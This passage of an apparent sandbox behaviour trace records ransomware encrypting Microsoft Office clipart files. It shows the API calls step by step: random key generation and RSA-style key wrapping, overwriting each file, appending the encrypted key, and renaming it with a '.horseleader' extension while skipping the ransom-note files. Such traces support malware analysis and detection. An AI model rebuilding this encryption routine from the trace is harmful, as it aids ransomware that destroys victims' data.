(lpString1="AG00164_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.513] lstrlenW (lpString=".testttjffg") returned 11 [0252.513] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.513] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.513] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 67 [0252.514] StrStrW (lpFirst="AG00164_.GIF", lpSrch=".txt") returned 0x0 [0252.514] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13254) returned 1 [0252.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x33c6, lpOverlapped=0x0) returned 1 [0252.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcc3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x33c6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x33c6, lpOverlapped=0x0) returned 1 [0252.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0x0) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.517] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.517] CloseHandle (hObject=0x158) returned 1 [0252.517] GetProcessHeap () returned 0x780000 [0252.518] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.518] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.horseleader") returned 79 [0252.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.horseleader")) returned 1 [0252.518] GetProcessHeap () returned 0x780000 [0252.519] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.519] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b98100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x89b98100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2186, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00165_.GIF", cAlternateFileName="")) returned 1 [0252.519] 
lstrcmpiW (lpString1="AG00165_.GIF", lpString2="Windows") returned -1 [0252.519] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0252.519] StrStrIW (lpFirst="AG00165_.GIF", lpSrch=".horseleader") returned 0x0 [0252.519] lstrcmpW (lpString1="AG00165_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.519] lstrcmpW (lpString1="AG00165_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.519] lstrlenW (lpString=".testttjffg") returned 11 [0252.519] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.519] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.519] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 67 [0252.521] StrStrW (lpFirst="AG00165_.GIF", lpSrch=".txt") returned 0x0 [0252.521] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8582) returned 1 [0252.521] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2186, lpOverlapped=0x0) returned 1 [0252.523] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde7a, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.523] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2186, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2186, lpOverlapped=0x0) returned 1 [0252.524] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.524] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.524] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.524] CloseHandle (hObject=0x158) returned 1 [0252.524] GetProcessHeap () returned 0x780000 [0252.524] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.524] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.horseleader") returned 79 [0252.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.horseleader")) returned 1 [0252.525] GetProcessHeap () returned 0x780000 [0252.525] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.526] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81614600, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81614600, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x131e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00167_.GIF", cAlternateFileName="")) returned 1 [0252.526] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="Windows") returned -1 [0252.526] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0252.526] StrStrIW (lpFirst="AG00167_.GIF", lpSrch=".horseleader") returned 0x0 [0252.526] lstrcmpW (lpString1="AG00167_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.526] lstrcmpW (lpString1="AG00167_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.526] lstrlenW (lpString=".testttjffg") returned 11 [0252.526] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.526] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.526] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 67 [0252.527] StrStrW 
(lpFirst="AG00167_.GIF", lpSrch=".txt") returned 0x0 [0252.527] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4894) returned 1 [0252.527] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x131e, lpOverlapped=0x0) returned 1 [0252.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffece2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x131e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x131e, lpOverlapped=0x0) returned 1 [0252.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.531] CloseHandle (hObject=0x158) returned 1 [0252.531] GetProcessHeap () returned 0x780000 [0252.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.531] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.horseleader") returned 79 [0252.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\ag00167_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.horseleader")) returned 1 [0252.532] GetProcessHeap () returned 0x780000 [0252.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.532] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9c9200, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9c9200, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00169_.GIF", cAlternateFileName="")) returned 1 [0252.532] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="Windows") returned -1 [0252.532] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0252.532] StrStrIW (lpFirst="AG00169_.GIF", lpSrch=".horseleader") returned 0x0 [0252.532] lstrcmpW (lpString1="AG00169_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.532] lstrcmpW (lpString1="AG00169_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.532] lstrlenW (lpString=".testttjffg") returned 11 [0252.532] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.533] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.533] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 67 [0252.533] StrStrW (lpFirst="AG00169_.GIF", lpSrch=".txt") returned 0x0 [0252.533] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5375) returned 1 [0252.533] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x14ff, lpOverlapped=0x0) returned 1 [0252.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x14ff, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x14ff, lpOverlapped=0x0) returned 1 [0252.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.540] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.540] CloseHandle (hObject=0x158) returned 1 [0252.541] GetProcessHeap () returned 0x780000 
[0252.541] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.541] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.horseleader") returned 79 [0252.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.horseleader")) returned 1 [0252.542] GetProcessHeap () returned 0x780000 [0252.542] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.542] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a6b100, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x76a6b100, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00170_.GIF", cAlternateFileName="")) returned 1 [0252.542] lstrcmpiW (lpString1="AG00170_.GIF", lpString2="Windows") returned -1 [0252.542] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0252.542] StrStrIW (lpFirst="AG00170_.GIF", lpSrch=".horseleader") returned 0x0 [0252.542] lstrcmpW (lpString1="AG00170_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.542] lstrcmpW (lpString1="AG00170_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.543] lstrlenW (lpString=".testttjffg") returned 11 [0252.543] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.543] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.543] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 67 [0252.544] StrStrW (lpFirst="AG00170_.GIF", lpSrch=".txt") returned 0x0 [0252.544] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9248) returned 1 [0252.544] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2420, lpOverlapped=0x0) returned 1 [0252.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdbe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.546] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2420, lpOverlapped=0x0) returned 1 [0252.547] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.547] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.547] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.547] CloseHandle (hObject=0x158) returned 1 [0252.547] GetProcessHeap () returned 0x780000 [0252.547] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.547] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.horseleader") returned 79 [0252.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.horseleader")) returned 1 [0252.548] GetProcessHeap () returned 0x780000 [0252.548] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.548] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e1fd00, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x71e1fd00, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x1398, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00171_.GIF", cAlternateFileName="")) returned 1 [0252.548] lstrcmpiW (lpString1="AG00171_.GIF", lpString2="Windows") returned -1 [0252.548] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0252.548] StrStrIW (lpFirst="AG00171_.GIF", lpSrch=".horseleader") returned 0x0 [0252.549] lstrcmpW (lpString1="AG00171_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.549] lstrcmpW (lpString1="AG00171_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.549] lstrlenW (lpString=".testttjffg") returned 11 [0252.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.550] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 67 [0252.550] StrStrW (lpFirst="AG00171_.GIF", lpSrch=".txt") returned 0x0 [0252.550] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5016) returned 1 [0252.550] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1398, lpOverlapped=0x0) returned 1 [0252.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.553] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1398, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1398, lpOverlapped=0x0) returned 1 [0252.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.554] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.554] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 